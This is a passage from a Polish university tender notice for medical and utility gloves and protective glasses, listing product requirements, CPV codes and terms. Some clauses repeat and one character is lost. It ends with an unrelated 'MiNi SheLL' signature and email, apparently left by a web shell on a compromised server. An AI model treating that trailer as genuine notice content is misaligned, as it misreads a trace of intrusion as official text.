5. Wszędzie tam gdzie w opisie przedmiotu zamówienia zawartym w niniejszym SIWZ wskazane zostały normy, znaki towarowe, patenty, pochodzenie Zamawiający dopuszcza oferty równoważne. Za rozwiązania równoważne Zamawiający uzna te produkty, które spełniają wszystkie wymagania Zamawiającego, ( w szczególności parametry jakościowe i użytkowe o przeznaczeniu) i są identyczne lub nie gorsze od wskazanych w załączniku nr 6, 7 i 8 do niniejszej SIWZ.
6. Wykonawca który zaoferuje równoważne produkty do opisanych w SIWZ obowiązany jest w myśl art. 30 ust. 5 Pzp wykazać że oferowane przez niego dostawy ( produkty) spełniają wymagania określone przez Zamawiającego.
7. Dostarczone produkty muszą posiadać nienaruszone cechy pierwotnego opakowania.
8. Zamawiający zastrzega sobie prawo niewykorzystania pełnego zakresu ilościowo - asortymentowego określonego w załączniku nr 6, 7 i 8 do SIWZ. Wykonawcy nie będą przysługiwały w takim przypadku żadne roszczenia wobec Zamawiającego. Niezrealizowana wartość umowy nie może być większa niż 20 % wartości umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 33.14.14.20-0, 18.14.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rękawice gospodarcze i okulary.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa rękawic medycznych i gospodarczych oraz okularów ochronnych zwanych dalej produktami dla Uniwersytetu Medycznego w Lublinie. Szczegółowy opis przedmiotu zamówienia zawarty jest w  formularzu cenowym / opis przedmiotu zamówienia stanowiący odpowiednio załączniki nr 6, 7  i 8 do niniejszej SIWZ wg następujących zadań:
Zadanie nr 1 - Rękawice zabiegowe i diagnostyczne - wg załącznika nr 6 do niniejszej SIWZ
Zadanie nr 2 - Rękawice sekcyjne - wg załącznika nr 7 do niniejszej SIWZ
Zadanie nr 3 - Rękawice gospodarcze i okulary - wg załącznika nr 8 do niniejszej SIWZ
Wymagania dotyczące przedmiotu zamówienia:
1. Zamawiający wymaga, aby zaoferowany przez Wykonawcę asortyment posiadał aktualne dopuszczenie do obrotu na rynku polskim.
2. Na każdym opakowaniu jednostkowym i zbiorczym  musi znajdować się: nazwa rękawic, rodzaj, rozmiar, data produkcji, seria, data przydatności do użytku, nazwa producenta zgodnie z normą PN -EN 980 w zakresie zadań 1 i 3.
3. Zamawiający wymaga aby okres ważności ( przydatności do użycia) wynosił ? pełnego okresu ważności określony przez producenta danego asortymentu.
4. Ewentualne wskazanie w opisie przedmiotu zamówienia symbolu, nazwy lub producenta ma na celu określenie klasy produktu, jego jakości oraz służą ustaleniu standardu produktu, nie wskazują natomiast na konkretny wyrób lub konkretnego producenta.
5. Wszędzie tam gdzie w opisie przedmiotu zamówienia zawartym w niniejszym SIWZ wskazane zostały normy, znaki towarowe, patenty, pochodzenie Zamawiający dopuszcza oferty równoważne. Za rozwiązania równoważne Zamawiający uzna te produkty, które spełniają wszystkie wymagania Zamawiającego, ( w szczególności parametry jakościowe i użytkowe o przeznaczeniu) i są identyczne lub nie gorsze od wskazanych w załączniku nr 6, 7 i 8 do niniejszej SIWZ.
6. Wykonawca który zaoferuje równoważne produkty do opisanych w SIWZ obowiązany jest w myśl art. 30 ust. 5 Pzp wykazać że oferowane przez niego dostawy ( produkty) spełniają wymagania określone przez Zamawiającego.
7. Dostarczone produkty muszą posiadać nienaruszone cechy pierwotnego opakowania.
8. Zamawiający zastrzega sobie prawo niewykorzystania pełnego zakresu ilościowo - asortymentowego określonego w załączniku nr 6, 7 i 8 do SIWZ. Wykonawcy nie będą przysługiwały w takim przypadku żadne roszczenia wobec Zamawiającego. Niezrealizowana wartość umowy nie może być większa niż 20 % wartości umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 33.14.14.20-0, 18.14.10.00-9, 18.14.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com